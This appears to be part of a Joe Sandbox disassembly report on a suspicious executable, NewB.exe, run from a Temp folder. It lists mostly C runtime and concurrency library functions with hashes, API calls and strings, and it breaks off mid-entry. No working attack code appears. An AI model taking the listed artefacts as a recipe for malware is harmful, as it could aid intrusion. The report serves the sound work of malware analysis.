Opcode Fuzzy Hash: d2c581018c698599584711ab45f24c1078ff6b42d56dc436d3d44221cec0f7ca
Instruction Fuzzy Hash: F5115171540B58AAD521F7B0CC47FCFB7EC6F70700F80081DB2E966052EB65F5458692

Uniqueness

Uniqueness Score: -1.00%

Function 001A7240 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 001AC79C: mtx_do_lock.LIBCPMT ref: 001AC7A4

__Mtx_unlock.LIBCPMT ref: 001A7311
std::_Rethrow_future_exception.LIBCPMT ref: 001A7362
std::_Rethrow_future_exception.LIBCPMT ref: 001A7372
__Mtx_unlock.LIBCPMT ref: 001A7415
__Mtx_unlock.LIBCPMT ref: 001A751B
__Mtx_unlock.LIBCPMT ref: 001A7556

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: c94ea7d6e39916083c6a3bc88f7c6939e3c6c52a227b636639de7f2de2ec41bd
Instruction ID: f9483dbe86f6bd7b2f92edf09de54d0f998e2506c59233b407f228fdbfaba2b7
Opcode Fuzzy Hash: c94ea7d6e39916083c6a3bc88f7c6939e3c6c52a227b636639de7f2de2ec41bd
Instruction Fuzzy Hash: 29C1A075D087489FDF20DFB4C945BAEBBF4AF16300F04456DE81697682EB35AA08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001CFC10 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00197710,00000000), ref: 001CFC58
__fassign.LIBCMT ref: 001CFE37
__fassign.LIBCMT ref: 001CFE54
WriteFile.KERNEL32(?,00197710,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFE9C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001CFEDC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 001CFF88

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: bef88cb3bc28e0a0f91fe020c8f093abcb44f556faeebeaaa548d52fe0f1c8cc
Instruction ID: f3f760b43aaa74c85ffca0b2b53f5e2b1b6a14af3ad83f66951305c7aba228ea
Opcode Fuzzy Hash: bef88cb3bc28e0a0f91fe020c8f093abcb44f556faeebeaaa548d52fe0f1c8cc
Instruction Fuzzy Hash: 34D16C71D002599FCF15CFA8C880EEDBBB6EF59314F29416EE855BB242D730AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BE9D0 Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 001BEA11
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BEA19
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BEA43
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BEA4C
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BEACF
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 001BEAD7

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 7b847e1bc9b0132baad8d7da36713bcc063556c674ae38d9040828372ed73a5c
Instruction ID: 140b4362dafd3f934988ed4145f003f80bbc1d0d29a1f0ce8df4b24faf2e076c
Opcode Fuzzy Hash: 7b847e1bc9b0132baad8d7da36713bcc063556c674ae38d9040828372ed73a5c
Instruction Fuzzy Hash: C3415075A00519EFCB09DFA4C494AADBBF5FF88310F148159E906AB791CB74AE41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 001AEDD6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001AEDDD
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 001AEE07

Part of subcall function 001AF4CD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 001AF4EA

__alloca_probe_16.LIBCMT ref: 001AEE43
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 001AEE84
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 001AEEB6
__freea.LIBCMT ref: 001AEEDC

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 45146825d63c22e730cb7479f499ef4323ec2f1289235647fa23c8a5f12767b8
Instruction ID: 910dd7664c0470a71b9d2e0a24878174210aedf1b8d6d32440c2e8933bad4417
Opcode Fuzzy Hash: 45146825d63c22e730cb7479f499ef4323ec2f1289235647fa23c8a5f12767b8
Instruction Fuzzy Hash: B6317E79A001068FDF19DFA8C9816AEB7F5AF5A310F25406EE406E7350DB349E02CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 001BA119 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 001BA15C

Part of subcall function 001BB653: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 001BB6A2

GetCurrentThread.KERNEL32 ref: 001BA166
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 001BA172

Part of subcall function 001B0479: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 001B048B

Part of subcall function 001B0905: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 001B090C

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 001BA1B5

Part of subcall function 001BB605: SetEvent.KERNEL32(?,?,001BA1BA,001BAF4E,00000000,?,00000000,001BAF4E,00000004,001BB5FA,?,00000000,?,?,00000000), ref: 001BB649

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 001BA1BE

Part of subcall function 001BAC34: List.LIBCONCRT ref: 001BAC6A

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 001BA1CE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 8e8b15ffa7ae1e88ae3c6e9495c5f04e0ac7e90438c1fcec15fe5f4d550e3d0f
Instruction ID: d07ceb5520bcb82cd323cda59ba294aa052b3ca653613d0f3113f100cdd65fea
Opcode Fuzzy Hash: 8e8b15ffa7ae1e88ae3c6e9495c5f04e0ac7e90438c1fcec15fe5f4d550e3d0f
Instruction Fuzzy Hash: 1121BA31500A149FCB25EF69C9908ABF3F5FF5C300B404A5EE4439B661DB74E901CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001AEF4F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 001AEFAC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 001AEFB8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 001AEFD1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 001AEFFF
Concurrency::Context::Block.LIBCONCRT ref: 001AF021

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 5797b8d6f9a5b3c0a6efe1debe88d140593a8f32aa60ba3b4b3ad39e5ead3407
Instruction ID: e3636469c5d9572094e76ed2e85c17486602f842261170897b15fdf90c24eadd
Opcode Fuzzy Hash: 5797b8d6f9a5b3c0a6efe1debe88d140593a8f32aa60ba3b4b3ad39e5ead3407
Instruction Fuzzy Hash: E3217F78C04209CEDF25DFA4C9456EEB7F1FF26310F20062EE151A6191EB718A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C5027 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001C501E,001C3BE2,001AB645,86BBC188,?,00000000,001DB388,000000FF,?,001924EA,?,?), ref: 001C5035
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001C5043
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001C505C
SetLastError.KERNEL32(00000000,?,001C501E,001C3BE2,001AB645,86BBC188,?,00000000,001DB388,000000FF,?,001924EA,?,?), ref: 001C50AE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8b2339eb1aab2f15944a7248268f577741cd1ed526069c6be6bf5c48801bafb6
Instruction ID: da20ed5c950ee6f90a7b4258332a0cb0fa8710077b8516926bd7b032c3990475
Opcode Fuzzy Hash: 8b2339eb1aab2f15944a7248268f577741cd1ed526069c6be6bf5c48801bafb6
Instruction Fuzzy Hash: A001B133209A119EA7242AB4AC86F3A3696EB31775730032DF425855E1EF61ECD1D5D4

Uniqueness

Uniqueness Score: -1.00%

Function 001AFD0B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFD19
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFD1F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFD4C
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFD56
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 001AFD68
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AFD7E

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: d562917d4b61138711e683c6c9ae65beb84041033c255c62a4a9ddc6364a8e5d
Instruction ID: 54005c3564b88591ccf33a432663e2fd5617e3c8d42053a599cc3593521acef8
Opcode Fuzzy Hash: d562917d4b61138711e683c6c9ae65beb84041033c255c62a4a9ddc6364a8e5d
Instruction Fuzzy Hash: 6A01DF39600180A6CB16ABE5DC89FBE3A68EF56392F20443CF401EA4A0DB60D9418760

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F0A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 001C4F5D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 001C4F76
PMDtoOffset.LIBCMT ref: 001C4F9C

Strings

Bad dynamic_cast!, xrefs: 001C4FDE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 6dbd33aabdbcc3e7b3ced0051d0f9e76a511f60d1943ccd4b60b9abc4402eafa
Instruction ID: 344c54b502d9f6f375df5077ba6e8e2447e7c613a689310948e011830dd36467
Opcode Fuzzy Hash: 6dbd33aabdbcc3e7b3ced0051d0f9e76a511f60d1943ccd4b60b9abc4402eafa
Instruction Fuzzy Hash: 0B212432A086049FDF18DEA8D956FAE77A8EB74720B11811DF911D7181DB31E90086A1

Uniqueness

Uniqueness Score: -1.00%

Function 001C191A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C1975
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1994
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C19DB

Strings

pContext, xrefs: 001C198C

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: 2bfe7ddbc4eb541b6702b81db2f7f1ef6e450a09c1c2b2b3409de3224130493f
Instruction ID: 8afe8c9c6c3a2db036809ff29d0cd6002ee04a1a1aefc5cfd9fc627fbc36e573
Opcode Fuzzy Hash: 2bfe7ddbc4eb541b6702b81db2f7f1ef6e450a09c1c2b2b3409de3224130493f
Instruction Fuzzy Hash: 72210735740615ABCB15B764D8A5FBDB3A5BFB6324B04001EE50287293DB74EC41CA81

Uniqueness

Uniqueness Score: -1.00%

Function 001CDF34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe, xrefs: 001CDF39

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
API String ID: 0-1635312535
Opcode ID: 2bcd3309bf194884a8dd2fca3f2e7be982df1299502a707f0bbabf92452897f9
Instruction ID: ce1bb114961d99e07c83b71dfbcf2c855404df4ee7057401244d005016e9c580
Opcode Fuzzy Hash: 2bcd3309bf194884a8dd2fca3f2e7be982df1299502a707f0bbabf92452897f9
Instruction Fuzzy Hash: 8721B371208206AFDB206F61AC81F6B77ADFF30364721412CF52AC6150EB61DC4287A1

Uniqueness

Uniqueness Score: -1.00%

Function 001C7256 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 001C7298

Strings

.com, xrefs: 001C72D8
.bat, xrefs: 001C72C7
.cmd, xrefs: 001C72B6
.exe, xrefs: 001C72A5

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: e720e6444e738c8f385f5ab2ada349b5491c524e67b63aa5c620cc37bbcef9bd
Instruction ID: e1e6efe142fff5a84cd5dbea16eef7898846302b858aefdabac19b5cdb636651
Opcode Fuzzy Hash: e720e6444e738c8f385f5ab2ada349b5491c524e67b63aa5c620cc37bbcef9bd
Instruction Fuzzy Hash: 1C01DB37A0CA2626661460699C43F3B579C9BB1BB0716002EFC84F71C1EFD4DC4295E5

Uniqueness

Uniqueness Score: -1.00%

Function 001B4F93 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 001B4FF2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B5015
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 001B5057

Strings

ppVirtualProcessorRoots, xrefs: 001B500D
count, xrefs: 001B4FAB

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 828bbd4a5b99850676ccb2a1f436629cbd515c8c7a4e032cc3d80fb5904171b9
Instruction ID: 6dfd46587134501a37867dbccb2badced9d9aad6ced8d709f04773ade7ebf3fc
Opcode Fuzzy Hash: 828bbd4a5b99850676ccb2a1f436629cbd515c8c7a4e032cc3d80fb5904171b9
Instruction Fuzzy Hash: C121B039600605EFCB14EFA8D892EADB7F5BF59300F00802DF5069B692DB71AE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C60A7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 001C60F7

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: a7aeebcbab63acad1427d843c0349564e77c1797ba6544681b088ff4dc207053
Instruction ID: 4a3dfc14851f8db9d546589a5b04e7268350c94be6c32e809ee626416ff755bd
Opcode Fuzzy Hash: a7aeebcbab63acad1427d843c0349564e77c1797ba6544681b088ff4dc207053
Instruction Fuzzy Hash: 5E11EE31A41625EBCB224BA49C84F6E77689FB5B61F29012DED03BB292D770DD40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 001C2187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 001C21A7
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C21B8
StructuredWorkStealingQueue.LIBCMT ref: 001C21EE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C21FF

Strings

e, xrefs: 001C21C9

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
